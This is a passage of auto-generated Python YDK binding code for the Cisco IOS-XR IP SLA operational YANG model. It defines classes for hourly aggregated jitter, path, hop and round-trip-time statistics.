self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.UdpJitterStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('op_type', YLeaf(YType.enumeration, 'op-type')),
])
self.op_type = None
self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.IcmpPathJitterStats()
self.icmp_path_jitter_stats.parent = self
self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
self._children_yang_names.add("icmp-path-jitter-stats")
self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.UdpJitterStats()
self.udp_jitter_stats.parent = self
self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
self._children_yang_names.add("udp-jitter-stats")
self._segment_path = lambda: "specific-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats, ['op_type'], name, value)
class IcmpPathJitterStats(Entity):
"""
icmp path jitter stats
.. attribute:: source_address
IP Address of the source
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: dest_address
IP Address of the destination
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: hop_address
IP address of the hop in the path
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: packet_interval
Interval between echos in ms
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packet_count
Number of Echo replies received
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_count
Number of packets lost
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sequence_count
Number of out of sequence packets
**type**\: int
**range:** 0..4294967295
.. attribute:: discarded_sample_count
Number of discarded samples
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_errors_count
Number of packets with data corruption
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_error_count
Number of packets dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter
Jitter value for this node in the path
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum
Sum of positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum2
Sum of squares of positive jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pos_jitter_min
Minimum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_max
Maximum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_count
Number of positive jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum
Sum of negative jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_min
Minimum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_max
Maximum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum2
Sum of squares of negative jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: neg_jitter_count
Number of negative jitter values
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.IcmpPathJitterStats, self).__init__()
self.yang_name = "icmp-path-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('source_address', YLeaf(YType.str, 'source-address')),
('dest_address', YLeaf(YType.str, 'dest-address')),
('hop_address', YLeaf(YType.str, 'hop-address')),
('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('packet_count', YLeaf(YType.uint32, 'packet-count')),
('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
('jitter', YLeaf(YType.uint32, 'jitter')),
('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
])
self.source_address = None
self.dest_address = None
self.hop_address = None
self.packet_interval = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.packet_count = None
self.packet_loss_count = None
self.out_of_sequence_count = None
self.discarded_sample_count = None
self.verify_errors_count = None
self.dropped_error_count = None
self.jitter = None
self.pos_jitter_sum = None
self.pos_jitter_sum2 = None
self.pos_jitter_min = None
self.pos_jitter_max = None
self.pos_jitter_count = None
self.neg_jitter_sum = None
self.neg_jitter_min = None
self.neg_jitter_max = None
self.neg_jitter_sum2 = None
self.neg_jitter_count = None
self._segment_path = lambda: "icmp-path-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)
class UdpJitterStats(Entity):
"""
udp jitter stats
.. attribute:: jitter_in
Input Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter_out
Output Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_sd
Packets lost in source to destination (SD) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_ds
Packets lost in destination to source (DS) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_out_of_sequence
Packets out of sequence
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_mia
Packets missing in action (cannot determine if theywere lost in SD or DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_skipped
Packets which are skipped
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_late_arrivals
Packets arriving late
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_invalid_tstamp
Packets with bad timestamps
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_errors_count
Number of internal errors
**type**\: int
**range:** 0..4294967295
.. attribute:: busies_count
Number of busies
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_sd_sum2
Sum of squares of positive jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_sd_min
Minimum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_max
Maximum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_count
Number of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_sd_sum2
Sum of squares of negative jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_sd_min
Minimum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_max
Maximum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_count
Number of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_ds_sum2
Sum of squares of positive jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_ds_min
Minimum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_max
Maximum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_count
Number of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_ds_sum2
Sum of squares of negative jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_ds_min
Minimum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_max
Maximum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_count
Number of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_count
Number of probe/probe\-response pairs used to compute one\-way statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_min
Minimum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_max
Maximum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum
Sum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum2
Sum of squares of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: one_way_ds_min
Minimum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_max
Maximum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum
Sum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum2
Sum of squares of the OneWayMinDS and OneWayMaxDS values (msec)
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.UdpJitterStats, self).__init__()
self.yang_name = "udp-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('jitter_in', YLeaf(YType.uint32, 'jitter-in')),
('jitter_out', YLeaf(YType.uint32, 'jitter-out')),
('packet_loss_sd', YLeaf(YType.uint32, 'packet-loss-sd')),
('packet_loss_ds', YLeaf(YType.uint32, 'packet-loss-ds')),
('packet_out_of_sequence', YLeaf(YType.uint32, 'packet-out-of-sequence')),
('packet_mia', YLeaf(YType.uint32, 'packet-mia')),
('packet_skipped', YLeaf(YType.uint32, 'packet-skipped')),
('packet_late_arrivals', YLeaf(YType.uint32, 'packet-late-arrivals')),
('packet_invalid_tstamp', YLeaf(YType.uint32, 'packet-invalid-tstamp')),
('internal_errors_count', YLeaf(YType.uint32, 'internal-errors-count')),
('busies_count', YLeaf(YType.uint32, 'busies-count')),
('positive_sd_sum', YLeaf(YType.uint32, 'positive-sd-sum')),
('positive_sd_sum2', YLeaf(YType.uint64, 'positive-sd-sum2')),
('positive_sd_min', YLeaf(YType.uint32, 'positive-sd-min')),
('positive_sd_max', YLeaf(YType.uint32, 'positive-sd-max')),
('positive_sd_count', YLeaf(YType.uint32, 'positive-sd-count')),
('negative_sd_sum', YLeaf(YType.uint32, 'negative-sd-sum')),
('negative_sd_sum2', YLeaf(YType.uint64, 'negative-sd-sum2')),
('negative_sd_min', YLeaf(YType.uint32, 'negative-sd-min')),
('negative_sd_max', YLeaf(YType.uint32, 'negative-sd-max')),
('negative_sd_count', YLeaf(YType.uint32, 'negative-sd-count')),
('positive_ds_sum', YLeaf(YType.uint32, 'positive-ds-sum')),
('positive_ds_sum2', YLeaf(YType.uint64, 'positive-ds-sum2')),
('positive_ds_min', YLeaf(YType.uint32, 'positive-ds-min')),
('positive_ds_max', YLeaf(YType.uint32, 'positive-ds-max')),
('positive_ds_count', YLeaf(YType.uint32, 'positive-ds-count')),
('negative_ds_sum', YLeaf(YType.uint32, 'negative-ds-sum')),
('negative_ds_sum2', YLeaf(YType.uint64, 'negative-ds-sum2')),
('negative_ds_min', YLeaf(YType.uint32, 'negative-ds-min')),
('negative_ds_max', YLeaf(YType.uint32, 'negative-ds-max')),
('negative_ds_count', YLeaf(YType.uint32, 'negative-ds-count')),
('one_way_count', YLeaf(YType.uint32, 'one-way-count')),
('one_way_sd_min', YLeaf(YType.uint32, 'one-way-sd-min')),
('one_way_sd_max', YLeaf(YType.uint32, 'one-way-sd-max')),
('one_way_sd_sum', YLeaf(YType.uint32, 'one-way-sd-sum')),
('one_way_sd_sum2', YLeaf(YType.uint64, 'one-way-sd-sum2')),
('one_way_ds_min', YLeaf(YType.uint32, 'one-way-ds-min')),
('one_way_ds_max', YLeaf(YType.uint32, 'one-way-ds-max')),
('one_way_ds_sum', YLeaf(YType.uint32, 'one-way-ds-sum')),
('one_way_ds_sum2', YLeaf(YType.uint64, 'one-way-ds-sum2')),
])
self.jitter_in = None
self.jitter_out = None
self.packet_loss_sd = None
self.packet_loss_ds = None
self.packet_out_of_sequence = None
self.packet_mia = None
self.packet_skipped = None
self.packet_late_arrivals = None
self.packet_invalid_tstamp = None
self.internal_errors_count = None
self.busies_count = None
self.positive_sd_sum = None
self.positive_sd_sum2 = None
self.positive_sd_min = None
self.positive_sd_max = None
self.positive_sd_count = None
self.negative_sd_sum = None
self.negative_sd_sum2 = None
self.negative_sd_min = None
self.negative_sd_max = None
self.negative_sd_count = None
self.positive_ds_sum = None
self.positive_ds_sum2 = None
self.positive_ds_min = None
self.positive_ds_max = None
self.positive_ds_count = None
self.negative_ds_sum = None
self.negative_ds_sum2 = None
self.negative_ds_min = None
self.negative_ds_max = None
self.negative_ds_count = None
self.one_way_count = None
self.one_way_sd_min = None
self.one_way_sd_max = None
self.one_way_sd_sum = None
self.one_way_sd_sum2 = None
self.one_way_ds_min = None
self.one_way_ds_max = None
self.one_way_ds_sum = None
self.one_way_ds_sum2 = None
self._segment_path = lambda: "udp-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Target.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class Paths(Entity):
"""
Table of paths identified in the 1\-hour
interval
.. attribute:: path
Paths identified in a 1\-hour interval
**type**\: list of :py:class:`Path <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths, self).__init__()
self.yang_name = "paths"
self.yang_parent_name = "non-distributed"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("path", ("path", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path))])
self._leafs = OrderedDict()
self.path = YList(self)
self._segment_path = lambda: "paths"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths, [], name, value)
class Path(Entity):
"""
Paths identified in a 1\-hour interval
.. attribute:: path_index (key)
Path Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: hops
Table of hops for a particular path
**type**\: :py:class:`Hops <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path, self).__init__()
self.yang_name = "path"
self.yang_parent_name = "paths"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['path_index']
self._child_container_classes = OrderedDict([("hops", ("hops", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('path_index', YLeaf(YType.int32, 'path-index')),
])
self.path_index = None
self.hops = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops()
self.hops.parent = self
self._children_name_map["hops"] = "hops"
self._children_yang_names.add("hops")
self._segment_path = lambda: "path" + "[path-index='" + str(self.path_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path, ['path_index'], name, value)
class Hops(Entity):
"""
Table of hops for a particular path
.. attribute:: hop
Total 1\-hour aggregated statistics for a hop in a path\-enabled operation
**type**\: list of :py:class:`Hop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops, self).__init__()
self.yang_name = "hops"
self.yang_parent_name = "path"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("hop", ("hop", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop))])
self._leafs = OrderedDict()
self.hop = YList(self)
self._segment_path = lambda: "hops"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops, [], name, value)
class Hop(Entity):
"""
Total 1\-hour aggregated statistics
for a hop in a path\-enabled operation
.. attribute:: hop_index (key)
Hop Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop, self).__init__()
self.yang_name = "hop"
self.yang_parent_name = "hops"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hop_index']
self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('hop_index', YLeaf(YType.int32, 'hop-index')),
])
self.hop_index = None
self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.CommonStats()
self.common_stats.parent = self
self._children_name_map["common_stats"] = "common-stats"
self._children_yang_names.add("common-stats")
self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats()
self.specific_stats.parent = self
self._children_name_map["specific_stats"] = "specific-stats"
self._children_yang_names.add("specific-stats")
self._segment_path = lambda: "hop" + "[hop-index='" + str(self.hop_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop, ['hop_index'], name, value)
class CommonStats(Entity):
"""
Common Stats
.. attribute:: operation_time
Operation Time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: return_code
Return code
**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: update_count
Number of updates processed
**type**\: int
**range:** 0..4294967295
.. attribute:: ok_count
Number of updates with Okay return code
**type**\: int
**range:** 0..4294967295
.. attribute:: disconnect_count
Number of updates with Disconnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: timeout_count
Number of updates with Timeout return code
**type**\: int
**range:** 0..4294967295
.. attribute:: busy_count
Number of updates with Busy return code
**type**\: int
**range:** 0..4294967295
.. attribute:: no_connection_count
Number of updates with NotConnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_count
Number of updates with Dropped return code
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_error_count
Number of updates with InternalError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: sequence_error_count
Number of updates with SeqError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_error_count
Number of updates with VerifyError return code
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.CommonStats, self).__init__()
self.yang_name = "common-stats"
self.yang_parent_name = "hop"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('operation_time', YLeaf(YType.uint64, 'operation-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('update_count', YLeaf(YType.uint32, 'update-count')),
('ok_count', YLeaf(YType.uint32, 'ok-count')),
('disconnect_count', YLeaf(YType.uint32, 'disconnect-count')),
('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
('busy_count', YLeaf(YType.uint32, 'busy-count')),
('no_connection_count', YLeaf(YType.uint32, 'no-connection-count')),
('dropped_count', YLeaf(YType.uint32, 'dropped-count')),
('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
('sequence_error_count', YLeaf(YType.uint32, 'sequence-error-count')),
('verify_error_count', YLeaf(YType.uint32, 'verify-error-count')),
])
self.operation_time = None
self.return_code = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.update_count = None
self.ok_count = None
self.disconnect_count = None
self.timeout_count = None
self.busy_count = None
self.no_connection_count = None
self.dropped_count = None
self.internal_error_count = None
self.sequence_error_count = None
self.verify_error_count = None
self._segment_path = lambda: "common-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
"""
Operation Specific Stats
.. attribute:: icmp_path_jitter_stats
icmp path jitter stats
**type**\: :py:class:`IcmpPathJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.IcmpPathJitterStats>`
.. attribute:: udp_jitter_stats
udp jitter stats
**type**\: :py:class:`UdpJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.UdpJitterStats>`
.. attribute:: op_type
op type
**type**\: :py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats, self).__init__()
self.yang_name = "specific-stats"
self.yang_parent_name = "hop"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
